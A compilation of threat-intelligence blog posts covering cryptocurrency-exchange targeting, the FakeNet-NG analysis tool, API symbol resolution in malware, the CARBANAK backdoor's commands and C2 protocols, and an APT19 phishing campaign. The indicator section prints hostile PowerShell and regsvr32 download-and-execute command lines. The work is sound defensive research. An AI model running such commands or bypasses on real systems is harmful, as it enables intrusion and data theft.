If actors compromise an exchange itself (as opposed to an individual account or wallet) they potentially can move cryptocurrencies out of online wallets, swapping them for other, more anonymous cryptocurrencies or send them directly to other wallets on different exchanges to withdraw them in fiat currencies such as South Korean won, US dollars, or Chinese renminbi. As the regulatory environment around cryptocurrencies is still emerging, some exchanges in different jurisdictions may have lax anti-money laundering controls easing this process and make the exchanges an attractive tactic for anyone seeking hard currency.


As bitcoin and other cryptocurrencies have increased in value in the last year, nation states are beginning to take notice. Recently, an advisor to President Putin in Russia announced plans to raise funds to increase Russia's share of bitcoin mining, and senators in Australia's parliament have proposed developing their own national cryptocurrency.

Consequently, it should be no surprise that cryptocurrencies, as an emerging asset class, are becoming a target of interest by a regime that operates in many ways like a criminal enterprise. While at present North Korea is somewhat distinctive in both their willingness to engage in financial crime and their possession of cyber espionage capabilities, the uniqueness of this combination will likely not last long-term as rising cyber powers may see similar potential. Cyber criminals may no longer be the only nefarious actors in this space.

Introducing Linux Support for FakeNet-NG: FLARE’s Next Generation Dynamic Network Analysis Tool


In 2016, FLARE introduced FakeNet-NG, an open-source network analysis tool written in Python. FakeNet-NG allows security analysts to observe and interact with network applications using standard or custom protocols on a single Windows host, which is especially useful for malware analysis and reverse engineering. Since FakeNet-NG’s release, FLARE has added support for additional protocols. FakeNet-NG now has out-of-the-box support for DNS, HTTP (including BITS), FTP, TFTP, IRC, SMTP, POP, TCP, and UDP as well as SSL.

Building on this work, FLARE has now brought FakeNet-NG to Linux. This allows analysts to perform basic dynamic analysis either on a single Linux host or using a separate, dedicated machine in the same way as INetSim. INetSim has made amazing contributions to the productivity of the security community and is still the tool of choice for many analysts. Now, FakeNet-NG gives analysts a cross-platform tool for malware analysis that can directly integrate with all the great Python-based infosec tools that continually emerge in the field.

Getting and Installing FakeNet-NG on Linux

If you are running REMnux, then good news: REMnux now comes with FakeNet-NG installed, and existing users can get it by running the update-remnux command.

For other Linux distributions, setting up and using FakeNet-NG will require the Python pip package manager, the net-tools package, and the development files for OpenSSL, libffi, and libnetfilterqueue. Here is how to quickly obtain the appropriate prerequisites for a few common Linux distributions:

  • Debian and Ubuntu: sudo apt-get install python-pip python-dev libssl-dev libffi-dev libnetfilter-queue-dev net-tools
  • Fedora 25 and CentOS 7: 
    • yum -y update;
    • yum -y install epel-release; # <-- If CentOS
    • yum -y install redhat-rpm-config; # <-- If Fedora
    • yum -y groupinstall 'Development Tools'; yum -y install python-pip python-devel openssl-devel libffi-devel libnetfilter_queue-devel net-tools

Once you have the prerequisites, you can download the latest version of FakeNet-NG and install it using install.

A Tale of Two Modes

On Linux, FakeNet-NG can be deployed in MultiHost mode on a separate host dedicated to network simulation, or in the experimental SingleHost mode for analyzing software locally. Windows only supports SingleHost mode. FakeNet-NG is configured by default to run in NetworkMode: Auto, which will automatically select SingleHost mode on Windows or MultiHost mode on Linux. Table 1 lists the currently supported NetworkMode settings by operating system.





Default (Auto)




Default (Auto)

Table 1: FakeNet-NG NetworkMode support per platform

FakeNet-NG’s support for SingleHost mode on Linux currently has limitations.

First, FakeNet-NG does not yet support conditional redirection of specific processes, hosts, or ports on Linux. This means that settings like ProcessWhiteList will not work as expected. We plan to add support for these settings in a later release. In the meantime, SingleHost mode supports redirecting all Internet-bound traffic to local listeners, which is the main use case for malware analysts.

Second, the python-netfilterqueue library is hard-coded to handle datagrams of no more than 4,012 octets in length. Loopback interfaces are commonly configured with high maximum transmittal unit (MTU) settings that allow certain applications to exceed this hard-coded limit, resulting in unanticipated network behavior. An example of a network application that may exhibit issues due to this would be a large file transfer via FTP. A workaround is to recompile python-netfilterqueue with a larger buffer size or to decrease the MTU for the loopback interface (i.e. lo) to 4,012 or less.

Configuring FakeNet-NG on Linux

In addition to the new NetworkMode setting, Linux support for FakeNet-NG introduces the following Linux-specific configuration items:

  • LinuxRedirectNonlocal: For MultiHost mode, this setting specifies a comma-delimited list of network interfaces for which to redirect all traffic to the local host so that FakeNet-NG can reply to it. The setting in FakeNet-NG’s default configuration is *, which configures FakeNet-NG to redirect on all interfaces.
  • LinuxFlushIptables: Deletes all iptables rules before adding rules for FakeNet-NG. The original rules are restored as part of FakeNet-NG’s shutdown sequence which is triggered when you hit Ctrl+C. This reduces the likelihood of conflicting, erroneous, or duplicate rules in the event of unexpected termination, and is enabled in FakeNet-NG’s default configuration.
  • LinuxFlushDnsCommand: Specifies the command to flush the DNS resolver cache. When using FakeNet-NG in SingleHost mode on Linux, this ensures that name resolution requests are forwarded to a DNS service such as the FakeNet-NG DNS listener instead of using cached answers. The setting is not applicable on all distributions of Linux, but is populated by default with the correct command for Ubuntu Linux. Refer to your distribution’s documentation for the proper command for this behavior.

Starting FakeNet-NG on Linux

Before using FakeNet-NG, also be sure to disable any services that may bind to ports corresponding to the FakeNet-NG listeners you plan to use. An example is Ubuntu’s use of a local dnsmasq service. You can use netstat to find such services and should refer to your Linux distribution’s documentation to determine how to disable them.

You can start FakeNet-NG by invoking fakenet with root privileges, as shown in Figure 1.

Figure 1: Starting FakeNet-NG on Linux

You can alter FakeNet-NG’s configuration by either directly editing the file displayed in the first line of FakeNet-NG’s output, or by creating a copy and specifying its location with the -c command-line option.


FakeNet-NG now brings the convenience of a modern, Python-based, malware-oriented network simulation tool to Linux, supporting the full complement of listeners that are available on FakeNet-NG for Windows. Users of REMnux can make use of FakeNet-NG already, while users of other Linux distributions can download and install it using standard package management tools.

Remote Symbol Resolution


The following blog discusses a couple of common techniques that malware uses to obscure its access to the Windows API. In both forms examined, analysts must calculate the API start address and resolve the symbol from the runtime process in order to determine functionality.

After introducing the techniques, we present an open source tool we developed that can be used to resolve addresses from a process running in a virtual machine by an IDA script. This gives us an efficient way to quickly add readability back into the disassembly. 


When performing an analysis, it is very common to see malware try to obscure the API it uses. As a malware analyst, determining which API is used is one of the first things we must resolve in order to determine the capabilities of the code.

Two common obfuscations we are going to look at in this blog are encoded function pointer tables and detours style hook stubs. In both of these scenarios the entry point to the API is not directly visible in the binary.

For an example of what we are talking about, consider the code in Figure 1, which was taken from a memory dump of xdata crypto ransomware sample C6A2FB56239614924E2AB3341B1FBBA5.

Figure 1: API obfuscation code from a crypto ransomware sample

In Figure 1, we see one numeric value being loaded into eax, XORed against another, and then being called as a function pointer. These numbers only make sense in the context of a running process. We can calculate the final number from the values contained in the memory dump, but we also need a way to know which API address it resolved to in this particular running process. We also have to take into account that DLLs can be rebased due to conflicts in preferred base address, and systems with ASLR enabled.

Figure 2 shows one other place we can look to see where the values were initially set.

Figure 2: Crypto malware setting obfuscated function pointer from API hash

In this case, the initial value is loaded from an API hash lookup – again not of immediate value. Here we have hit a crossroad, with multiple paths we can take to resolve the problem. We can search for a published hash list, extract the hasher and build our own database, or figure out a way to dynamically resolve the decoded API address.

Before we choose which path to take, let us consider another sample. Figure 3 shows code from Andromeda sample, 3C8B018C238AF045F70B38FC27D0D640.

Figure 3: API redirection code from an Andromeda sample

This code was found in a memory injection. Here we can see what looks to be a detours style trampoline, where the first instruction was stolen from the actual Windows API and placed in a small stub with an immediate jump taken back to the original API + x bytes.

In this situation, the malware accesses all of the API through these stubs and we have no clear resolution as to which stub points where. From the disassembly we can also see that the stolen instructions are of variable length.

In order to resolve where these functions go, we would have to:

  • enumerate all of the stubs
  • calculate how many bytes are in the first instruction
  • extract the jmp address
  • subtract the stolen byte count to find the API entrypoint
  • resolve the calculated address for this specific process instance
  • rename the stub to a meaningful value

In this sample, looking for cross references on where the value is set does not yield any results.

Here we have two manifestations of essentially the same problem. How do we best resolve calculated API addresses and add this information back into our IDA database?

One of the first techniques used was to calculate all of the final addresses, write them to a binary file, inject the data into the process, and examine the table in the debugger (Figure 4). Since the debugger already has a API address look up table, this gives a crude yet quick method to get the information we need.

Figure 4: ApiLogger from iDefense MAP injecting a data file into a process and examining results in debugger

From here we can extract the resolved symbols and write a script to integrate them into our IDB. This works, but it is bulky and involves several steps.

Our Tool

What we really want is to build our own symbol lookup table for a process and create a streamlined way to access it from our scripts.

The first question is: How can we build our own lookup table of API addresses to API names? To resolve this information, we need to follow some steps:

  • enumerate all of the DLLs loaded into a process
  • for each DLL, walk the export table and extract function name and RVA
  • calculate API entrypoint based on DLL base address and export RVA
  • build a lookup table based on all of this information

While this sounds like a lot of work, libraries are already available that handle all of the heavy lifting. Figure 5 shows a screenshot of a remote lookup tool we developed for such occasions.

Figure 5: Open source remote lookup application

In order to maximize the benefits of this type of tool, the tool must be efficient. What is the best way to interface with this data? There are several factors to consider here, including how the data is submitted, what input formats are accepted, and how well the tool can be integrated with the flow of the analysis process.

The first consideration is how we interface with it. For maximum flexibility, three methods were chosen. Lookups can be submitted:

  • individually via textbox
  • in bulk by file or
  • over the network by a remote client

In terms of input formats, it accepts the following:

  • hex memory address
  • case insensitive API name
  • dll_name@ordinal
  • dll_name.export_name

The tool output is in the form of a CSV list that includes address, name, ordinal, and DLL.

With the base tool capabilities in place, we still need an efficient streamlined way to use it during our analysis. The individual lookups are nice for offhand queries and testing, but not in bulk. The bulk file lookup is nice on occasion, but it still requires data export/import to integrate results with your IDA database.

What is really needed is a way to run a script in IDA, calculate the API address, and then resolve that address inline while running an IDA script. This allows us to rename functions and pointers on the fly as the script runs all in one shot. This is where the network client capability comes in.

Again, there are many approaches to this. Here we chose to integrate a network client into a beta of IDA Jscript (Figure 6). IDA Jscript is an open source IDA scripting tool with IDE that includes syntax highlighting, IntelliSense, function prototype tooltips, and debugger.

Figure 6: Open source IDA Jscript decoding and resolving API addresses

In this example we see a script that decodes the xdata pointer table, resolves the API address over the network, and then generates an IDC script to rename the pointers in IDA.

After running this script and applying the results, the decompiler output becomes plainly readable (Figure 7).

Figure 7: Decompiler output from the xdata sample after symbol resolution

Going back to the Andromeda sample, the API information can be restored with the brief idajs script shown in Figure 8.

Figure 8: small idajs script to remotely resolve and rename Andromeda API hook stubs

For IDAPython users, a python remote lookup client is also available.


It is common for malware to use techniques that mask the Windows API being used. These techniques force malware analysts to have to extract data from runtime data, calculate entry point addresses, and then resolve their meaning within the context of a particular running process.

In previous techniques, several manual stages were involved that were bulky and time intensive.

This blog introduces a small simple open source tool that can integrate well into multiple IDA scripting languages. This combination allows analysts streamlined access to the data required to quickly bypass these types of obfuscations and continue on with their analysis.

We are happy to be able to open source the remote lookup application so that others may benefit and adapt it to their own needs. Sample network clients have been provided for Python, C#, D, and VB6.

Download a copy of the tool today.

Behind the CARBANAK Backdoor

In this blog, we will take a closer look at the powerful, versatile backdoor known as CARBANAK (aka Anunak). Specifically, we will focus on the operational details of its use over the past few years, including its configuration, the minor variations observed from sample to sample, and its evolution. With these details, we will then draw some conclusions about the operators of CARBANAK. For some additional background on the CARBANAK backdoor, see the papers by Kaspersky and Group-IB and Fox-It.

Technical Analysis

Before we dive into the meat of this blog, a brief technical analysis of the backdoor is necessary to provide some context. CARBANAK is a full-featured backdoor with data-stealing capabilities and a plugin architecture. Some of its capabilities include key logging, desktop video capture, VNC, HTTP form grabbing, file system management, file transfer, TCP tunneling, HTTP proxy, OS destruction, POS and Outlook data theft and reverse shell. Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time.

Monitoring Threads

The backdoor may optionally start one or more threads that perform continuous monitoring for various purposes, as described in Table 1.  

Thread Name


Key logger

Logs key strokes for configured processes and sends them to the command and control (C2) server

Form grabber

Monitors HTTP traffic for form data and sends it to the C2 server

POS monitor

Monitors for changes to logs stored in C:\NSB\Coalition\Logs and nsb.pos.client.log and sends parsed data to the C2 server

PST monitor

Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server

HTTP proxy monitor

Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use

Table 1: Monitoring threads


In addition to its file management capabilities, this data-stealing backdoor supports 34 commands that can be received from the C2 server. After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line. The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters. Table 2 lists these commands.

Command Hash

Command Name




Runs each command specified in the configuration file (see the Configuration section).



Updates the state value (see the Configuration section).



Desktop video recording



Downloads executable and injects into new process



Ammyy Admin tool



Updates self



Add/Update klgconfig (analysis incomplete)



Starts HTTP proxy



Renders computer unbootable by wiping the MBR



Reboots the operating system



Creates a network tunnel



Adds new C2 server or proxy address for pseudo-HTTP protocol



Adds new C2 server for custom binary protocol



Creates or deletes Windows user account



Enables concurrent RDP (analysis incomplete)



Adds Notification Package (analysis incomplete)



Deletes file or service



Adds command to the configuration file (see the Configuration section)



Downloads executable and injects directly into new process



Send Windows accounts details to the C2 server



Takes a screenshot of the desktop and sends it to the C2 server



Backdoor sleeps until specified date






Upload files to the C2 server



Runs VNC plugin



Runs specified executable file



Uninstalls backdoor



Returns list of running processes to the C2 server



Change C2 protocol used by plugins



Download and execute shellcode from specified address



Terminates the first process found specified by name



Initiates a reverse shell to the C2 server



Plugin control



Updates backdoor

Table 2: Supported Commands


A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Some of these values indicate which C2 protocol to use, whether the backdoor has been installed, and whether the PST monitoring thread is running or not. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it.

Figure 1 and Figure 2 illustrate some sample, decoded configuration files we have come across in our investigations.

Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it

Figure 2: Configuration file that adds TCP tunnels and records desktop video

Command and Control

CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol.

Pseudo-HTTP Protocol

Messages for the pseudo-HTTP protocol are delimited with the ‘|’ character. A message starts with a host ID composed by concatenating a hash value generated from the computer’s hostname and MAC address to a string likely used as a campaign code. Once the message has been formatted, it is sandwiched between an additional two fields of randomly generated strings of upper and lower case alphabet characters. An example of a command polling message and a response to the listprocess command are given in Figure 3 and Figure 4, respectively.

Figure 3: Example command polling message

Figure 4: Example command response message

Messages are encrypted using Microsoft’s implementation of RC2 in CBC mode with PKCS#5 padding. The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively. The eight-byte initialization vector (IV) is a randomly generated string consisting of upper and lower case alphabet characters. It is prepended to the encrypted and encoded message.

The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload. The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php.

This URI is then used in a GET or POST request. The body of the POST request may contain files contained in the cabinet format. A sample GET request is shown in Figure 5.

Figure 5: Sample pseudo-HTTP beacon

The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command. The backdoor also searches for proxy configurations to use in the registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings and for each profile in the Mozilla Firefox configuration file at %AppData%\Mozilla\Firefox\<ProfileName>\prefs.js.

Custom Binary Protocol

Figure 6 describes the structure of the malware’s custom binary protocol. If a message is larger than 150 bytes, it is compressed with an unidentified algorithm. If a message is larger than 4096 bytes, it is broken into compressed chunks. This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.

Figure 6: Binary protocol message format

Version 1

In the earliest version of the binary protocol, we have discovered that the message bodies that are stored in the <chunkData> field are simply XORed with the host ID. The initial message is not encrypted and contains the host ID.

Version 2

Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session. This key is sent in the initial message.

Version 3

Version 3 adds encryption to the headers. The first 19 bytes of the message headers (up to the <hdrXORKey2> field) are XORed with a five-byte key that is randomly generated per message and stored in the <hdrXORKey2> field. If the <flag> field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages.

Version 4

This version adds a bit more complexity to the header encryption scheme. The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed.

Version 5

Version 5 is the most sophisticated of the binary protocols we have seen. A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately. Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm. All subsequent messages are encrypted with AES in CBC mode. The use of public key cryptography makes decryption of the session key infeasible without the C2 server’s private key.

The Roundup

We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here.

Protocol Evolution

As described earlier, CARBANAK’s binary protocol has undergone several significant changes over the years. Figure 7 illustrates a rough timeline of this evolution based on the compile times of samples we have in our collection. This may not be entirely accurate because our visibility is not complete, but it gives us a general idea as to when the changes occurred. It has been observed that some builds of this data-stealing backdoor use outdated versions of the protocol. This may suggest multiple groups of operators compiling their own builds of this data-stealing backdoor independently.

Figure 7: Timeline of binary protocol versions

*It is likely that we are missing an earlier build that utilized version 3.

Build Tool

Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.

Rapid Builds

Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, with some of the compile times being quite close in proximity. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.

What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not. This command downloads an executable from the C2 and directly runs it in memory. In another case, one build was programmed to check for the existence of the domain in the trusted sites list for Internet Explorer while the other was not. Blizko is an online money transfer service. We have also seen that different monitoring threads from Table 1 are enabled from build to build. These minor changes suggest that the code is quickly modified and compiled to adapt to the needs of the operator for particular targets.

Campaign Code and Compile Time Correlation

In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code. Figure 8 shows some of the relationships that can be observed in our data set.

Campaign Code

Compile Date































Figure 8: Campaign code to compile time relationships

Recent Updates

Recently, 64 bit variants of the backdoor have been discovered. We shared details about such variants in a recent blog post. Some of these variants are programmed to sleep until a configured activation date when they will become active.


The “Carbanak Group”

Much of the publicly released reporting surrounding the CARBANAK malware refers to a corresponding “Carbanak Group”, who appears to be behind the malicious activity associated with this data-stealing backdoor. FireEye iSIGHT Intelligence has tracked several separate overarching campaigns employing the CARBANAK tool and other associated backdoors, such as DRIFTPIN (aka Toshliph). With the data available at this time, it is unclear how interconnected these campaigns are – if they are all directly orchestrated by the same criminal group, or if these campaigns were perpetrated by loosely affiliated actors sharing malware and techniques.


In all Mandiant investigations to date where the CARBANAK backdoor has been discovered, the activity has been attributed to the FIN7 threat group. FIN7 has been extremely active against the U.S. restaurant and hospitality industries since mid-2015.

FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment. FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity.

We have covered recent FIN7 activity in previous public blog posts:

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity.

Widespread Bank Targeting Throughout the U.S., Middle East and Asia

Proofpoint initially reported on a widespread campaign targeting banks and financial organizations throughout the U.S. and Middle East in early 2016. We identified several additional organizations in these regions, as well as in Southeast Asia and Southwest Asia being targeted by the same attackers.

This cluster of activity persisted from late 2014 into early 2016. Most notably, the infrastructure utilized in this campaign overlapped with LAZIOK, NETWIRE and other malware targeting similar financial entities in these regions.


DRIFTPIN (aka Spy.Agent.ORM, and Toshliph) has been previously associated with CARBANAK in various campaigns. We have seen it deployed in initial spear phishing by FIN7 in the first half of 2016.  Also, in late 2015, ESET reported on CARBANAK associated attacks, detailing a spear phishing campaign targeting Russian and Eastern European banks using DRIFTPIN as the malicious payload. Cyphort Labs also revealed that variants of DRIFTPIN associated with this cluster of activity had been deployed via the RIG exploit kit placed on two compromised Ukrainian banks’ websites.

FireEye iSIGHT Intelligence observed this wave of spear phishing aimed at a large array of targets, including U.S. financial institutions and companies associated with Bitcoin trading and mining activities. This cluster of activity continues to be active now to this day, targeting similar entities. Additional details on this latest activity are available on the FireEye iSIGHT Intelligence MySIGHT Portal.

Earlier CARBANAK Activity

In December 2014, Group-IB and Fox-IT released a report about an organized criminal group using malware called "Anunak" that has targeted Eastern European banks, U.S. and European point-of-sale systems and other entities. Kaspersky released a similar report about the same group under the name "Carbanak" in February 2015. The name “Carbanak” was coined by Kaspersky in this report – the malware authors refer to the backdoor as Anunak.

This activity was further linked to the 2014 exploitation of ATMs in Ukraine. Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement.


The details that can be extracted from CARBANAK provide us with a unique insight into the operational details behind this data-stealing malware. Several inferences can be made when looking at such data in bulk as we discussed above and are summarized as follows:

  1. Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have access to the source code directly with knowledge on how to modify it or have a close relationship to the developer(s).
  2. Some of the operators may be compiling their own builds of the backdoor independently.
  3. A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.
  4. Varying campaign codes indicate that independent or loosely affiliated criminal actors are employing CARBANAK in a wide-range of intrusions that target a variety of industries but are especially directed at financial institutions across the globe, as well as the restaurant and hospitality sectors within the U.S.

Privileges and Credentials: Phished at the Request of Counsel


In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government.

APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE 2017-0199. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one observed phishing lure delivered a Cobalt Strike payload.

As of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment firms for competitive economic purposes.

This purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide technical indicators that their IT personnel can use for proactive hunting and detection.

The Emails

APT19 phishing emails from this campaign originated from sender email accounts from the "@cloudsend[.]net" domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for more details.

The Attachments

APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits. The following sections describe the two methods in further detail.

RTF Attachments

Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099, the observed RTF attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer hosted at tk-in-f156.2bunny[.]com for further analysis. Figure 1 is a screenshot of a packet capture showing one of the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.

Figure 1: RTF PCAP

XLSM Attachments

The XLSM attachments contained multiple worksheets with content that reflected the attachment name. The attachments also contained an image that requested the user to “Enable Content”, which would enable macro support if it was disabled. Figure 2 provides a screenshot of one of the XLSM files (MD5:30f149479c02b741e897cdb9ecd22da7).

Figure 2: Enable macros

One of the malicious XLSM attachments that we observed contained a macro that:

  1. Determined the system architecture to select the correct path for PowerShell
  2. Launched a ZLIB compressed and Base64 encoded command with PowerShell. This is a typical technique used by Meterpreter stagers.

Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).

Figure 3: XLSX Macro

Figure 4 contains the decoded output of the encoded text.

Figure 4: Decoded ZLIB + Base64 payload

The shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers.

Figure 5: GET Request with minimal HTTP headers

Converting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out network-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs.

Figure 6: Decoded shellcode

FireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7.

Figure 7: Alternate macro

This macro uses Casey Smith’s “Squiblydoo” Application Whitelisting bypass technique to run the command in Figure 8.

Figure 8: Application Whitelisting Bypass

The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.

Figure 9: SCT contents

Figure 10 provides the decoded script. Notice the “$DoIt” string, which is usually indicative of a Cobalt Strike payload.

Figure 10: Decoded SCT contents

A quick conversion of the contents of the variable “$var_code” from Base64 to ASCII shows some familiar network indicators, shown in Figure 11.

Figure 11: $var_code to ASCII

Second Stage Payload

Once the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload, configured with the following parameters:

  • Process Inject Targets:
    • %windir%\syswow64\rundll32.exe
    • %windir%\sysnative\rundll32.exe
  • c2_user_agents
    • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
  • Named Pipes
    • \\%s\pipe\msagent_%x
  • beacon_interval
    • 60
  • C2
    • autodiscover.2bunny[.]com/submit.php
    • autodiscover.2bunny[.]com/IE9CompatViewList.xml
    • sfo02s01-in-f2.cloudsend[.]net/submit.php
    • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • C2 Port
    • TCP/80

Figure 12 depicts an example of a BEACON C2 attempt from this payload.

Figure 12: Cobalt Strike BEACON C2

FireEye Product Detections

The following FireEye products currently detect and block the methods described above. Table 1 lists the current detection and blocking capabilities by product.

Detection Name







XSLM Macro launch




XSLM Macro launch

Malware Object



BEACON written to disk




BEACON Callback

















Table 1: Detection review

*Appliances must be configured for block mode.


FireEye recommends organizations perform the following steps to mitigate the risk of this campaign:

  1. Microsoft Office users should apply the patch from Microsoft as soon as possible, if they have not already installed it.
  2. Search historic and future emails that match the included indicators of compromise.
  3. Review web proxy logs for connections to the included network based indicators of compromise.
  4. Block connections to the included fully qualified domain names.
  5. Review endpoints for the included host based indicators of compromise.

Indicators of Compromise

The following section provides the IOCs for the variants of the phishing emails and malicious payloads that FireEye has observed during this campaign.

Email Senders
  • PressReader <infodept@cloudsend[.]net>
  • Angela Suh <angela.suh@cloudsend[.]net>
  • Ashley Safronoff <ashley.safronoff@cloudsend[.]net>
  • Lindsey Hersh <lindsey.hersh@cloudsend[.]net>
  • Sarah Roberto sarah.roberto@cloudsend[.]net
  • noreply@cloudsend[.]net
Email Subject Lines
  • Macron Denies Authenticity Of Leak, French Prosecutors Open Probe
  • Macron Document Leaker Releases New Images, Promises More Information
  • Are Emmanuel Macron's Tax Evasion Documents Real?
  • Time Allocation
  • Vacancy Report
  • china paper table and graph
  • results with zeros – some ready not all finished
  • Macron Leaks contain secret plans for the islamisation of France and Europe
Attachment Names
  • Macron_Authenticity.doc.rtf
  • Macron_Information.doc.rtf
  • US and EU Trade with China and China CA.xlsm
  • Tables 4 5 7 Appendix with zeros.xlsm
  • Project Codes - 05.30.17.xlsm
  • Weekly Vacancy Status Report 5-30-15.xlsm
  • Macron_Tax_Evasion.doc.rtf
  • Macron_secret_plans.doc.rtf
Network Based Indicators (NBI)
  • lyncdiscover.2bunny[.]com
  • autodiscover.2bunny[.]com
  • lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/
  • lyncdiscover.2bunny[.]com/Autodiscover
  • autodiscover.2bunny[.]com/K5om
  • sfo02s01-in-f2.cloudsend[.]net/submit.php
  • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • tk-in-f156.2bunny[.]com
  • tk-in-f156.2bunny[.]com/Agreement.doc
  • 104.236.77[.]169
  • 138.68.45[.]9
  • 162.243.143[.]145
  • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
  • tf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)
Host Based Indicators (HBI)

RTF MD5 hash values

  • 0bef39d0e10b1edfe77617f494d733a8
  • 0e6da59f10e1c4685bb5b35a30fc8fb6
  • cebd0e9e05749665d893e78c452607e2

XLSX MD5 hash values

  • 38125a991efc6ab02f7134db0ebe21b6
  • 3a1dca21bfe72368f2dd46eb4d9b48c4
  • 30f149479c02b741e897cdb9ecd22da7

BEACON and Meterpreter payload MD5 hash values

  • bae0b39197a1ac9e24bdf9a9483b18ea
  • 1151619d06a461456b310096db6bc548

Process arguments, named pipes, and file paths

  • powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("<base64 blob>")
  • regsvr32.exe /s /n /u /i:hxxps:// scrobj.dll
  • \\<ip>\pipe\msagent_<4 digits>
  • C:\Documents and Settings\<user>\Local Settings\Temp\K5om.dll (4 character DLL based on URI of original GET request)
Yara Rules

       author=" @TekDefense"
       description="This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
